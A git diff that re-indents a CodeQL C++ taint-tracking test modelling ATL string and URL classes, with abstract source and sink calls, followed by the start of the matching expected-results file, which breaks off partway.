BOOL SetUserName(LPCTSTR lpszUser) throw(); + }; + + void test_CUrl() { + char* x = indirect_source(); + CUrl url; + url.CrackUrl(x, 0); + sink(url); // $ ir + sink(url.GetExtraInfo()); // $ ir + sink(url.GetHostName()); // $ ir + sink(url.GetPassword()); // $ ir + sink(url.GetSchemeName()); // $ ir + sink(url.GetUrlPath()); // $ ir + sink(url.GetUserName()); // $ ir + + { + CUrl url2; + DWORD len; + char buffer[1024]; + url2.CrackUrl(x, 0); + url2.CreateUrl(buffer, &len, 0); + sink(buffer); // $ ast ir + } + { + CUrl url2; + url2.SetExtraInfo(x); + sink(url2); // $ ir + } + { + CUrl url2; + url2.SetHostName(x); + sink(url2); // $ ir + } + { + CUrl url2; + url2.SetPassword(x); + sink(url2); // $ ir + } + { + CUrl url2; + url2.SetSchemeName(x); + sink(url2); // $ ir + } + { + CUrl url2; + url2.SetUrlPath(x); + sink(url2); // $ ir + } + { + CUrl url2; + url2.SetUserName(x); + sink(url2); // $ ir + } } -} -struct IAtlStringMgr {}; // simplified + struct IAtlStringMgr {}; // simplified -using XCHAR = char; -using YCHAR = wchar_t; + using XCHAR = char; + using YCHAR = wchar_t; -template -struct CSimpleStringT { - using PCXSTR = const BaseType*; // simplified - using PXSTR = BaseType*; // simplified + template + struct CSimpleStringT { + using PCXSTR = const BaseType*; // simplified + using PXSTR = BaseType*; // simplified - CSimpleStringT() throw(); - CSimpleStringT(const XCHAR* pchSrc, int nLength, IAtlStringMgr* pStringMgr); - CSimpleStringT(PCXSTR pszSrc, IAtlStringMgr* pStringMgr); - CSimpleStringT(const CSimpleStringT& strSrc); + CSimpleStringT() throw(); + CSimpleStringT(const XCHAR* pchSrc, int nLength, IAtlStringMgr* pStringMgr); + CSimpleStringT(PCXSTR pszSrc, IAtlStringMgr* pStringMgr); + CSimpleStringT(const CSimpleStringT& strSrc); - ~CSimpleStringT() throw(); + ~CSimpleStringT() throw(); - void Append(const CSimpleStringT& strSrc); - void Append(PCXSTR pszSrc, int nLength); - void Append(PCXSTR pszSrc); + void Append(const CSimpleStringT& strSrc); + void Append(PCXSTR pszSrc, int nLength); + void Append(PCXSTR pszSrc); - void AppendChar(XCHAR ch); + void AppendChar(XCHAR ch); - static void CopyChars(XCHAR* pchDest, const XCHAR* pchSrc, int nChars) throw(); - static void CopyChars(XCHAR* pchDest, size_t nDestLen, const XCHAR* pchSrc, int nChars) throw(); - static void CopyCharsOverlapped(XCHAR* pchDest, const XCHAR* pchSrc, int nChars) throw(); + static void CopyChars(XCHAR* pchDest, const XCHAR* pchSrc, int nChars) throw(); + static void CopyChars(XCHAR* pchDest, size_t nDestLen, const XCHAR* pchSrc, int nChars) throw(); + static void CopyCharsOverlapped(XCHAR* pchDest, const XCHAR* pchSrc, int nChars) throw(); - XCHAR GetAt(int iChar) const; - PXSTR GetBuffer(int nMinBufferLength); - PXSTR GetBuffer(); - PXSTR GetBufferSetLength(int nLength); + XCHAR GetAt(int iChar) const; + PXSTR GetBuffer(int nMinBufferLength); + PXSTR GetBuffer(); + PXSTR GetBufferSetLength(int nLength); - PCXSTR GetString() const throw(); - PXSTR LockBuffer(); - void SetAt(int iChar, XCHAR ch); - void SetString(PCXSTR pszSrc, int nLength); - void SetString(PCXSTR pszSrc); - operator PCXSTR() const throw(); - XCHAR operator[](int iChar) const; + PCXSTR GetString() const throw(); + PXSTR LockBuffer(); + void SetAt(int iChar, XCHAR ch); + void SetString(PCXSTR pszSrc, int nLength); + void SetString(PCXSTR pszSrc); + operator PCXSTR() const throw(); + XCHAR operator[](int iChar) const; - CSimpleStringT& operator+=(PCXSTR pszSrc); - CSimpleStringT& operator+=(const CSimpleStringT& strSrc); - CSimpleStringT& operator+=(char ch); - CSimpleStringT& operator+=(unsigned char ch); - CSimpleStringT& operator+=(wchar_t ch); + CSimpleStringT& operator+=(PCXSTR pszSrc); + CSimpleStringT& operator+=(const CSimpleStringT& strSrc); + CSimpleStringT& operator+=(char ch); + CSimpleStringT& operator+=(unsigned char ch); + CSimpleStringT& operator+=(wchar_t ch); - CSimpleStringT& operator=(PCXSTR pszSrc); - CSimpleStringT& operator=(const CSimpleStringT& strSrc); -}; + CSimpleStringT& operator=(PCXSTR pszSrc); + CSimpleStringT& operator=(const CSimpleStringT& strSrc); + }; -void test_CSimpleStringT() { - char* x = indirect_source(); + void test_CSimpleStringT() { + char* x = indirect_source(); - CSimpleStringT s1(x, 10, nullptr); - sink(s1.GetString()); // $ ir + CSimpleStringT s1(x, 10, nullptr); + sink(s1.GetString()); // $ ir - CSimpleStringT s2(x, nullptr); - sink(s2.GetString()); // $ ir + CSimpleStringT s2(x, nullptr); + sink(s2.GetString()); // $ ir - CSimpleStringT s3(s2); - sink(s3.GetString()); // $ ir + CSimpleStringT s3(s2); + sink(s3.GetString()); // $ ir - CSimpleStringT s4; - s4.Append(indirect_source()); - sink(s4.GetString()); // $ ir + CSimpleStringT s4; + s4.Append(indirect_source()); + sink(s4.GetString()); // $ ir - CSimpleStringT s5; - s5.Append(s4); - sink(s5.GetString()); // $ ir + CSimpleStringT s5; + s5.Append(s4); + sink(s5.GetString()); // $ ir - CSimpleStringT s6; - s6.Append(indirect_source(), 42); - sink(s6.GetString()); // $ ir + CSimpleStringT s6; + s6.Append(indirect_source(), 42); + sink(s6.GetString()); // $ ir - char buffer1[128]; - CSimpleStringT::CopyChars(buffer1, x, 10); - sink(buffer1); // $ ast ir + char buffer1[128]; + CSimpleStringT::CopyChars(buffer1, x, 10); + sink(buffer1); // $ ast ir - char buffer2[128]; - CSimpleStringT::CopyChars(buffer2, 128, x, 10); - sink(buffer2); // $ ast ir + char buffer2[128]; + CSimpleStringT::CopyChars(buffer2, 128, x, 10); + sink(buffer2); // $ ast ir - char buffer3[128]; - CSimpleStringT::CopyCharsOverlapped(buffer3, x, 10); - sink(buffer3); // $ ast ir + char buffer3[128]; + CSimpleStringT::CopyCharsOverlapped(buffer3, x, 10); + sink(buffer3); // $ ast ir - sink(s4.GetAt(0)); // $ ir - sink(s4.GetBuffer(10)); // $ ir - sink(s4.GetBuffer()); // $ ir - sink(s4.GetBufferSetLength(10)); // $ ir + sink(s4.GetAt(0)); // $ ir + sink(s4.GetBuffer(10)); // $ ir + sink(s4.GetBuffer()); // $ ir + sink(s4.GetBufferSetLength(10)); // $ ir - sink(s4.LockBuffer()); // $ ir + sink(s4.LockBuffer()); // $ ir - CSimpleStringT s7; - s7.SetAt(0, source()); - sink(s7.GetAt(0)); // $ ir + CSimpleStringT s7; + s7.SetAt(0, source()); + sink(s7.GetAt(0)); // $ ir - CSimpleStringT s8; - s8.SetString(indirect_source()); - sink(s8.GetAt(0)); // $ ir + CSimpleStringT s8; + s8.SetString(indirect_source()); + sink(s8.GetAt(0)); // $ ir - CSimpleStringT s9; - s9.SetString(indirect_source(), 1024); - sink(s9.GetAt(0)); // $ ir + CSimpleStringT s9; + s9.SetString(indirect_source(), 1024); + sink(s9.GetAt(0)); // $ ir - sink(static_cast::PCXSTR>(s1)); // $ ir - - sink(s1[0]); // $ ir -} + sink(static_cast::PCXSTR>(s1)); // $ ir + + sink(s1[0]); // $ ir + } -template -struct MakeOther {}; - -template<> -struct MakeOther { - using other_t = wchar_t; -}; - -template<> -struct MakeOther { - using other_t = char; -}; - -template -struct CStringT : public CSimpleStringT { - using XCHAR = BaseType; // simplified - using YCHAR = typename MakeOther::other_t; // simplified - using PCXSTR = typename CSimpleStringT::PCXSTR; - using PXSTR = typename CSimpleStringT::PXSTR; - CStringT() throw(); - - CStringT(IAtlStringMgr* pStringMgr) throw(); - CStringT(const VARIANT& varSrc); - CStringT(const VARIANT& varSrc, IAtlStringMgr* pStringMgr); - CStringT(const CStringT& strSrc); - CStringT(const CSimpleStringT& strSrc); - CStringT(const XCHAR* pszSrc); - CStringT(const YCHAR* pszSrc); - CStringT(LPCSTR pszSrc, IAtlStringMgr* pStringMgr); - CStringT(LPCWSTR pszSrc, IAtlStringMgr* pStringMgr); - CStringT(const unsigned char* pszSrc); - CStringT(char* pszSrc); - CStringT(unsigned char* pszSrc); - CStringT(wchar_t* pszSrc); - CStringT(const unsigned char* pszSrc, IAtlStringMgr* pStringMgr); - CStringT(char ch, int nLength = 1); - CStringT(wchar_t ch, int nLength = 1); - CStringT(const XCHAR* pch, int nLength); - CStringT(const YCHAR* pch, int nLength); - CStringT(const XCHAR* pch, int nLength, IAtlStringMgr* pStringMgr); - CStringT(const YCHAR* pch, int nLength, IAtlStringMgr* pStringMgr); - - operator CSimpleStringT &(); - - ~CStringT() throw(); - - BSTR AllocSysString() const; - void AppendFormat(PCXSTR pszFormat, ...); - void AppendFormat(UINT nFormatID, ...); - int Delete(int iIndex, int nCount = 1); - int Find(PCXSTR pszSub, int iStart=0) const throw(); - int Find(XCHAR ch, int iStart=0) const throw(); - int FindOneOf(PCXSTR pszCharSet) const throw(); - void Format(UINT nFormatID, ...); - void Format(PCXSTR pszFormat, ...); - BOOL GetEnvironmentVariable(PCXSTR pszVar); - int Insert(int iIndex, PCXSTR psz); - int Insert(int iIndex, XCHAR ch); - CStringT Left(int nCount) const; - BOOL LoadString(HINSTANCE hInstance, UINT nID, WORD wLanguageID); - BOOL LoadString(HINSTANCE hInstance, UINT nID); - BOOL LoadString(UINT nID); - CStringT& MakeLower(); - CStringT& MakeReverse(); - CStringT& MakeUpper(); - CStringT Mid(int iFirst, int nCount) const; - CStringT Mid(int iFirst) const; - int Replace(PCXSTR pszOld, PCXSTR pszNew); - int Replace(XCHAR chOld, XCHAR chNew); - CStringT Right(int nCount) const; - BSTR SetSysString(BSTR* pbstr) const; - CStringT SpanExcluding(PCXSTR pszCharSet) const; - CStringT SpanIncluding(PCXSTR pszCharSet) const; - CStringT Tokenize(PCXSTR pszTokens, int& iStart) const; - CStringT& Trim(XCHAR chTarget); - CStringT& Trim(PCXSTR pszTargets); - CStringT& Trim(); - CStringT& TrimLeft(XCHAR chTarget); - CStringT& TrimLeft(PCXSTR pszTargets); - CStringT& TrimLeft(); - CStringT& TrimRight(XCHAR chTarget); - CStringT& TrimRight(PCXSTR pszTargets); - CStringT& TrimRight(); -}; - -void test_CStringT() { - VARIANT v = source(); - - CStringT s1(v); - sink(s1.GetString()); // $ ir - - CStringT s2(v, nullptr); - sink(s2.GetString()); // $ ir - - CStringT s3(s2); - sink(s3.GetString()); // $ ir - - char* x = indirect_source(); - CStringT s4(x); - sink(s4.GetString()); // $ ir - - wchar_t* y = indirect_source(); - CStringT s5(y); - sink(s5.GetString()); // $ ir - - CStringT s6(x, nullptr); - sink(s6.GetString()); // $ ir - - CStringT s7(y, nullptr); - sink(s7.GetString()); // $ ir - - unsigned char* ucs = indirect_source(); - CStringT s8(ucs); - sink(s8.GetString()); // $ ir - - char c = source(); - CStringT s9(c); - sink(s9.GetString()); // $ ir - - wchar_t wc = source(); - CStringT s10(wc); - sink(s10.GetString()); // $ ir - - sink(static_cast&>(s1)); // $ ast ir - - auto bstr = s1.AllocSysString(); - sink(bstr); // $ ir - - CStringT s11; - s11.AppendFormat("%d", source()); - sink(s11.GetString()); // $ ir - - CStringT s12; - s12.AppendFormat(indirect_source()); - sink(s12.GetString()); // $ ir - - CStringT s13; - s13.AppendFormat(source()); - sink(s13.GetString()); // $ ir - - CStringT s14; - s14.AppendFormat(42, source()); - sink(s14.GetString()); // $ ir - - CStringT s15; - s15.AppendFormat(42, indirect_source()); - sink(s15.GetString()); // $ ir - - CStringT s16; - s16.AppendFormat("%s", indirect_source()); - - CStringT s17; - s17.Insert(0, x); - sink(s17.GetString()); // $ ir - - CStringT s18; - s18.Insert(0, source()); - sink(s18.GetString()); // $ ir - - sink(s1.Left(42).GetString()); // $ ir - - CStringT s20; - s20.LoadString(source()); - sink(s20.GetString()); // $ ir - - sink(s1.MakeLower().GetString()); // $ ir - sink(s1.MakeReverse().GetString()); // $ ir - sink(s1.MakeUpper().GetString()); // $ ir - sink(s1.Mid(0, 42).GetString()); // $ ir - - CStringT s21; - s21.Replace("abc", x); - sink(s21.GetString()); // $ ir - - CStringT s22; - s22.Replace('\n', source()); - sink(s22.GetString()); // $ ir + template + struct MakeOther {}; + + template<> + struct MakeOther { + using other_t = wchar_t; + }; + + template<> + struct MakeOther { + using other_t = char; + }; + + template + struct CStringT : public CSimpleStringT { + using XCHAR = BaseType; // simplified + using YCHAR = typename MakeOther::other_t; // simplified + using PCXSTR = typename CSimpleStringT::PCXSTR; + using PXSTR = typename CSimpleStringT::PXSTR; + CStringT() throw(); + + CStringT(IAtlStringMgr* pStringMgr) throw(); + CStringT(const VARIANT& varSrc); + CStringT(const VARIANT& varSrc, IAtlStringMgr* pStringMgr); + CStringT(const CStringT& strSrc); + CStringT(const CSimpleStringT& strSrc); + CStringT(const XCHAR* pszSrc); + CStringT(const YCHAR* pszSrc); + CStringT(LPCSTR pszSrc, IAtlStringMgr* pStringMgr); + CStringT(LPCWSTR pszSrc, IAtlStringMgr* pStringMgr); + CStringT(const unsigned char* pszSrc); + CStringT(char* pszSrc); + CStringT(unsigned char* pszSrc); + CStringT(wchar_t* pszSrc); + CStringT(const unsigned char* pszSrc, IAtlStringMgr* pStringMgr); + CStringT(char ch, int nLength = 1); + CStringT(wchar_t ch, int nLength = 1); + CStringT(const XCHAR* pch, int nLength); + CStringT(const YCHAR* pch, int nLength); + CStringT(const XCHAR* pch, int nLength, IAtlStringMgr* pStringMgr); + CStringT(const YCHAR* pch, int nLength, IAtlStringMgr* pStringMgr); + + operator CSimpleStringT &(); + + ~CStringT() throw(); + + BSTR AllocSysString() const; + void AppendFormat(PCXSTR pszFormat, ...); + void AppendFormat(UINT nFormatID, ...); + int Delete(int iIndex, int nCount = 1); + int Find(PCXSTR pszSub, int iStart=0) const throw(); + int Find(XCHAR ch, int iStart=0) const throw(); + int FindOneOf(PCXSTR pszCharSet) const throw(); + void Format(UINT nFormatID, ...); + void Format(PCXSTR pszFormat, ...); + BOOL GetEnvironmentVariable(PCXSTR pszVar); + int Insert(int iIndex, PCXSTR psz); + int Insert(int iIndex, XCHAR ch); + CStringT Left(int nCount) const; + BOOL LoadString(HINSTANCE hInstance, UINT nID, WORD wLanguageID); + BOOL LoadString(HINSTANCE hInstance, UINT nID); + BOOL LoadString(UINT nID); + CStringT& MakeLower(); + CStringT& MakeReverse(); + CStringT& MakeUpper(); + CStringT Mid(int iFirst, int nCount) const; + CStringT Mid(int iFirst) const; + int Replace(PCXSTR pszOld, PCXSTR pszNew); + int Replace(XCHAR chOld, XCHAR chNew); + CStringT Right(int nCount) const; + BSTR SetSysString(BSTR* pbstr) const; + CStringT SpanExcluding(PCXSTR pszCharSet) const; + CStringT SpanIncluding(PCXSTR pszCharSet) const; + CStringT Tokenize(PCXSTR pszTokens, int& iStart) const; + CStringT& Trim(XCHAR chTarget); + CStringT& Trim(PCXSTR pszTargets); + CStringT& Trim(); + CStringT& TrimLeft(XCHAR chTarget); + CStringT& TrimLeft(PCXSTR pszTargets); + CStringT& TrimLeft(); + CStringT& TrimRight(XCHAR chTarget); + CStringT& TrimRight(PCXSTR pszTargets); + CStringT& TrimRight(); + }; + + void test_CStringT() { + VARIANT v = source(); + + CStringT s1(v); + sink(s1.GetString()); // $ ir + + CStringT s2(v, nullptr); + sink(s2.GetString()); // $ ir + + CStringT s3(s2); + sink(s3.GetString()); // $ ir + + char* x = indirect_source(); + CStringT s4(x); + sink(s4.GetString()); // $ ir + + wchar_t* y = indirect_source(); + CStringT s5(y); + sink(s5.GetString()); // $ ir + + CStringT s6(x, nullptr); + sink(s6.GetString()); // $ ir + + CStringT s7(y, nullptr); + sink(s7.GetString()); // $ ir + + unsigned char* ucs = indirect_source(); + CStringT s8(ucs); + sink(s8.GetString()); // $ ir + + char c = source(); + CStringT s9(c); + sink(s9.GetString()); // $ ir + + wchar_t wc = source(); + CStringT s10(wc); + sink(s10.GetString()); // $ ir + + sink(static_cast&>(s1)); // $ ast ir + + auto bstr = s1.AllocSysString(); + sink(bstr); // $ ir + + CStringT s11; + s11.AppendFormat("%d", source()); + sink(s11.GetString()); // $ ir + + CStringT s12; + s12.AppendFormat(indirect_source()); + sink(s12.GetString()); // $ ir + + CStringT s13; + s13.AppendFormat(source()); + sink(s13.GetString()); // $ ir + + CStringT s14; + s14.AppendFormat(42, source()); + sink(s14.GetString()); // $ ir + + CStringT s15; + s15.AppendFormat(42, indirect_source()); + sink(s15.GetString()); // $ ir + + CStringT s16; + s16.AppendFormat("%s", indirect_source()); + + CStringT s17; + s17.Insert(0, x); + sink(s17.GetString()); // $ ir + + CStringT s18; + s18.Insert(0, source()); + sink(s18.GetString()); // $ ir + + sink(s1.Left(42).GetString()); // $ ir + + CStringT s20; + s20.LoadString(source()); + sink(s20.GetString()); // $ ir + + sink(s1.MakeLower().GetString()); // $ ir + sink(s1.MakeReverse().GetString()); // $ ir + sink(s1.MakeUpper().GetString()); // $ ir + sink(s1.Mid(0, 42).GetString()); // $ ir + + CStringT s21; + s21.Replace("abc", x); + sink(s21.GetString()); // $ ir + + CStringT s22; + s22.Replace('\n', source()); + sink(s22.GetString()); // $ ir - sink(s2.Right(42).GetString()); // $ ir + sink(s2.Right(42).GetString()); // $ ir - BSTR bstr2; - s1.SetSysString(&bstr2); - sink(bstr2); // $ ast ir + BSTR bstr2; + s1.SetSysString(&bstr2); + sink(bstr2); // $ ast ir - sink(s1.SpanExcluding("abc").GetString()); // $ ir - sink(s1.SpanIncluding("abc").GetString()); // $ ir - - int start = 0; - sink(s1.Tokenize("abc", start).GetString()); // $ ir + sink(s1.SpanExcluding("abc").GetString()); // $ ir + sink(s1.SpanIncluding("abc").GetString()); // $ ir + + int start = 0; + sink(s1.Tokenize("abc", start).GetString()); // $ ir - sink(s1.Trim('a').GetString()); // $ ir - sink(s1.Trim("abc").GetString()); // $ ir - sink(s1.Trim().GetString()); // $ ir - sink(s1.TrimLeft('a').GetString()); // $ ir - sink(s1.TrimLeft("abc").GetString()); // $ ir - sink(s1.TrimLeft().GetString()); // $ ir - sink(s1.TrimRight('a').GetString()); // $ ir - sink(s1.TrimRight("abc").GetString()); // $ ir - sink(s1.TrimRight().GetString()); // $ ir -} + sink(s1.Trim('a').GetString()); // $ ir + sink(s1.Trim("abc").GetString()); // $ ir + sink(s1.Trim().GetString()); // $ ir + sink(s1.TrimLeft('a').GetString()); // $ ir + sink(s1.TrimLeft("abc").GetString()); // $ ir + sink(s1.TrimLeft().GetString()); // $ ir + sink(s1.TrimRight('a').GetString()); // $ ir + sink(s1.TrimRight("abc").GetString()); // $ ir + sink(s1.TrimRight().GetString()); // $ ir + } -struct CStringData { - void* data() throw(); -}; + struct CStringData { + void* data() throw(); + }; -void test_CStringData() { - CStringData d = source(); - sink(d.data()); // $ ir -} + void test_CStringData() { + CStringData d = source(); + sink(d.data()); // $ ir + } -template -struct CStrBufT { - typedef CSimpleStringT StringType; + template + struct CStrBufT { + typedef CSimpleStringT StringType; - using PCXSTR = typename StringType::PCXSTR; - using PXSTR = typename StringType::PXSTR; + using PCXSTR = typename StringType::PCXSTR; + using PXSTR = typename StringType::PXSTR; - CStrBufT(StringType& str, int nMinLength, DWORD dwFlags); - CStrBufT(StringType& str); + CStrBufT(StringType& str, int nMinLength, DWORD dwFlags); + CStrBufT(StringType& str); - operator PCXSTR() const throw(); - operator PXSTR() throw(); -}; + operator PCXSTR() const throw(); + operator PXSTR() throw(); + }; -void test_CStrBufT() { - CStringT s = source>(); - CStrBufT b(s, 42, 0); - sink(static_cast::PCXSTR>(b)); // $ ir - sink(static_cast::PXSTR>(b)); // $ ir + void test_CStrBufT() { + CStringT s = source>(); + CStrBufT b(s, 42, 0); + sink(static_cast::PCXSTR>(b)); // $ ir + sink(static_cast::PXSTR>(b)); // $ ir + } } \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index ed09207adf0b..24f651ca3892 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -140,1144 +140,1144 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | arrayassignment.cpp:145:12:145:12 | 5 | arrayassignment.cpp:145:7:145:13 | access to array | TAINT | | arrayassignment.cpp:146:7:146:10 | arr3 | arrayassignment.cpp:146:7:146:13 | access to array | | | arrayassignment.cpp:146:12:146:12 | 5 | arrayassignment.cpp:146:7:146:13 | access to array | TAINT | -| atl.cpp:34:30:34:30 | 1 | atl.cpp:34:29:34:30 | - ... | TAINT | -| atl.cpp:78:14:78:25 | call to source | atl.cpp:79:21:79:21 | x | | -| atl.cpp:79:21:79:21 | x | atl.cpp:79:21:79:22 | call to _U_STRINGorID | TAINT | -| atl.cpp:79:21:79:22 | call to _U_STRINGorID | atl.cpp:80:10:80:10 | u | | -| atl.cpp:84:17:84:43 | call to indirect_source | atl.cpp:85:21:85:21 | y | | -| atl.cpp:85:21:85:21 | y | atl.cpp:85:21:85:22 | call to _U_STRINGorID | TAINT | -| atl.cpp:85:21:85:22 | call to _U_STRINGorID | atl.cpp:86:10:86:10 | u | | -| atl.cpp:105:15:105:35 | call to indirect_source | atl.cpp:106:19:106:19 | x | | -| atl.cpp:106:19:106:19 | x | atl.cpp:106:19:106:20 | call to CA2AEX | TAINT | -| atl.cpp:106:19:106:20 | call to CA2AEX | atl.cpp:107:29:107:29 | a | | -| atl.cpp:106:19:106:20 | call to CA2AEX | atl.cpp:108:10:108:10 | a | | -| atl.cpp:106:19:106:20 | call to CA2AEX | atl.cpp:109:10:109:10 | a | | -| atl.cpp:106:19:106:20 | call to CA2AEX | atl.cpp:110:3:110:3 | a | | -| atl.cpp:107:29:107:29 | ref arg a | atl.cpp:108:10:108:10 | a | | -| atl.cpp:107:29:107:29 | ref arg a | atl.cpp:109:10:109:10 | a | | -| atl.cpp:107:29:107:29 | ref arg a | atl.cpp:110:3:110:3 | a | | -| atl.cpp:108:10:108:10 | a [post update] | atl.cpp:109:10:109:10 | a | | -| atl.cpp:108:10:108:10 | a [post update] | atl.cpp:110:3:110:3 | a | | -| atl.cpp:109:10:109:10 | a [post update] | atl.cpp:110:3:110:3 | a | | -| atl.cpp:113:15:113:35 | call to indirect_source | atl.cpp:114:19:114:19 | x | | -| atl.cpp:114:19:114:23 | call to CA2AEX | atl.cpp:115:29:115:29 | a | | -| atl.cpp:114:19:114:23 | call to CA2AEX | atl.cpp:116:10:116:10 | a | | -| atl.cpp:114:19:114:23 | call to CA2AEX | atl.cpp:117:10:117:10 | a | | -| atl.cpp:114:19:114:23 | call to CA2AEX | atl.cpp:118:3:118:3 | a | | -| atl.cpp:115:29:115:29 | ref arg a | atl.cpp:116:10:116:10 | a | | -| atl.cpp:115:29:115:29 | ref arg a | atl.cpp:117:10:117:10 | a | | -| atl.cpp:115:29:115:29 | ref arg a | atl.cpp:118:3:118:3 | a | | -| atl.cpp:116:10:116:10 | a [post update] | atl.cpp:117:10:117:10 | a | | -| atl.cpp:116:10:116:10 | a [post update] | atl.cpp:118:3:118:3 | a | | -| atl.cpp:117:10:117:10 | a [post update] | atl.cpp:118:3:118:3 | a | | -| atl.cpp:131:14:131:34 | call to indirect_source | atl.cpp:133:20:133:20 | x | | -| atl.cpp:131:14:131:34 | call to indirect_source | atl.cpp:139:20:139:20 | x | | -| atl.cpp:133:20:133:20 | x | atl.cpp:133:20:133:21 | call to CA2CAEX | TAINT | -| atl.cpp:133:20:133:21 | call to CA2CAEX | atl.cpp:134:30:134:30 | a | | -| atl.cpp:133:20:133:21 | call to CA2CAEX | atl.cpp:135:10:135:10 | a | | -| atl.cpp:133:20:133:21 | call to CA2CAEX | atl.cpp:136:10:136:10 | a | | -| atl.cpp:133:20:133:21 | call to CA2CAEX | atl.cpp:137:3:137:3 | a | | -| atl.cpp:139:20:139:24 | call to CA2CAEX | atl.cpp:140:30:140:30 | a | | -| atl.cpp:139:20:139:24 | call to CA2CAEX | atl.cpp:141:10:141:10 | a | | -| atl.cpp:139:20:139:24 | call to CA2CAEX | atl.cpp:142:10:142:10 | a | | -| atl.cpp:139:20:139:24 | call to CA2CAEX | atl.cpp:143:3:143:3 | a | | -| atl.cpp:157:14:157:34 | call to indirect_source | atl.cpp:159:19:159:19 | x | | -| atl.cpp:157:14:157:34 | call to indirect_source | atl.cpp:165:19:165:19 | x | | -| atl.cpp:159:19:159:19 | x | atl.cpp:159:19:159:20 | call to CA2WEX | TAINT | -| atl.cpp:159:19:159:20 | call to CA2WEX | atl.cpp:160:30:160:30 | a | | -| atl.cpp:159:19:159:20 | call to CA2WEX | atl.cpp:161:10:161:10 | a | | -| atl.cpp:159:19:159:20 | call to CA2WEX | atl.cpp:162:10:162:10 | a | | -| atl.cpp:159:19:159:20 | call to CA2WEX | atl.cpp:163:3:163:3 | a | | -| atl.cpp:160:30:160:30 | ref arg a | atl.cpp:161:10:161:10 | a | | -| atl.cpp:160:30:160:30 | ref arg a | atl.cpp:162:10:162:10 | a | | -| atl.cpp:160:30:160:30 | ref arg a | atl.cpp:163:3:163:3 | a | | -| atl.cpp:161:10:161:10 | a [post update] | atl.cpp:162:10:162:10 | a | | -| atl.cpp:161:10:161:10 | a [post update] | atl.cpp:163:3:163:3 | a | | -| atl.cpp:161:12:161:16 | ref arg m_psz | atl.cpp:162:12:162:16 | m_psz | | -| atl.cpp:162:10:162:10 | a [post update] | atl.cpp:163:3:163:3 | a | | -| atl.cpp:165:19:165:23 | call to CA2WEX | atl.cpp:166:30:166:30 | a | | -| atl.cpp:165:19:165:23 | call to CA2WEX | atl.cpp:167:10:167:10 | a | | -| atl.cpp:165:19:165:23 | call to CA2WEX | atl.cpp:168:10:168:10 | a | | -| atl.cpp:165:19:165:23 | call to CA2WEX | atl.cpp:169:3:169:3 | a | | -| atl.cpp:166:30:166:30 | ref arg a | atl.cpp:167:10:167:10 | a | | -| atl.cpp:166:30:166:30 | ref arg a | atl.cpp:168:10:168:10 | a | | -| atl.cpp:166:30:166:30 | ref arg a | atl.cpp:169:3:169:3 | a | | -| atl.cpp:167:10:167:10 | a [post update] | atl.cpp:168:10:168:10 | a | | -| atl.cpp:167:10:167:10 | a [post update] | atl.cpp:169:3:169:3 | a | | -| atl.cpp:167:12:167:16 | ref arg m_psz | atl.cpp:168:12:168:16 | m_psz | | -| atl.cpp:168:10:168:10 | a [post update] | atl.cpp:169:3:169:3 | a | | -| atl.cpp:217:11:217:21 | call to source | atl.cpp:221:11:221:11 | x | | -| atl.cpp:220:20:220:20 | call to CAtlArray | atl.cpp:221:5:221:5 | a | | -| atl.cpp:220:20:220:20 | call to CAtlArray | atl.cpp:222:10:222:10 | a | | -| atl.cpp:220:20:220:20 | call to CAtlArray | atl.cpp:223:5:223:5 | a | | -| atl.cpp:220:20:220:20 | call to CAtlArray | atl.cpp:224:10:224:10 | a | | -| atl.cpp:220:20:220:20 | call to CAtlArray | atl.cpp:228:15:228:15 | a | | -| atl.cpp:220:20:220:20 | call to CAtlArray | atl.cpp:243:3:243:3 | a | | -| atl.cpp:221:5:221:5 | ref arg a | atl.cpp:222:10:222:10 | a | | -| atl.cpp:221:5:221:5 | ref arg a | atl.cpp:223:5:223:5 | a | | -| atl.cpp:221:5:221:5 | ref arg a | atl.cpp:224:10:224:10 | a | | -| atl.cpp:221:5:221:5 | ref arg a | atl.cpp:228:15:228:15 | a | | -| atl.cpp:221:5:221:5 | ref arg a | atl.cpp:243:3:243:3 | a | | -| atl.cpp:222:10:222:10 | ref arg a | atl.cpp:223:5:223:5 | a | | -| atl.cpp:222:10:222:10 | ref arg a | atl.cpp:224:10:224:10 | a | | -| atl.cpp:222:10:222:10 | ref arg a | atl.cpp:228:15:228:15 | a | | -| atl.cpp:222:10:222:10 | ref arg a | atl.cpp:243:3:243:3 | a | | -| atl.cpp:223:5:223:5 | ref arg a | atl.cpp:224:10:224:10 | a | | -| atl.cpp:223:5:223:5 | ref arg a | atl.cpp:228:15:228:15 | a | | -| atl.cpp:223:5:223:5 | ref arg a | atl.cpp:243:3:243:3 | a | | -| atl.cpp:224:10:224:10 | ref arg a | atl.cpp:228:15:228:15 | a | | -| atl.cpp:224:10:224:10 | ref arg a | atl.cpp:243:3:243:3 | a | | -| atl.cpp:226:20:226:21 | call to CAtlArray | atl.cpp:227:10:227:11 | a2 | | -| atl.cpp:226:20:226:21 | call to CAtlArray | atl.cpp:228:5:228:6 | a2 | | -| atl.cpp:226:20:226:21 | call to CAtlArray | atl.cpp:229:10:229:11 | a2 | | -| atl.cpp:226:20:226:21 | call to CAtlArray | atl.cpp:233:13:233:14 | a2 | | -| atl.cpp:226:20:226:21 | call to CAtlArray | atl.cpp:243:3:243:3 | a2 | | -| atl.cpp:227:10:227:11 | ref arg a2 | atl.cpp:228:5:228:6 | a2 | | -| atl.cpp:227:10:227:11 | ref arg a2 | atl.cpp:229:10:229:11 | a2 | | -| atl.cpp:227:10:227:11 | ref arg a2 | atl.cpp:233:13:233:14 | a2 | | -| atl.cpp:227:10:227:11 | ref arg a2 | atl.cpp:243:3:243:3 | a2 | | -| atl.cpp:228:5:228:6 | ref arg a2 | atl.cpp:229:10:229:11 | a2 | | -| atl.cpp:228:5:228:6 | ref arg a2 | atl.cpp:233:13:233:14 | a2 | | -| atl.cpp:228:5:228:6 | ref arg a2 | atl.cpp:243:3:243:3 | a2 | | -| atl.cpp:229:10:229:11 | ref arg a2 | atl.cpp:233:13:233:14 | a2 | | -| atl.cpp:229:10:229:11 | ref arg a2 | atl.cpp:243:3:243:3 | a2 | | -| atl.cpp:231:20:231:21 | call to CAtlArray | atl.cpp:232:10:232:11 | a3 | | -| atl.cpp:231:20:231:21 | call to 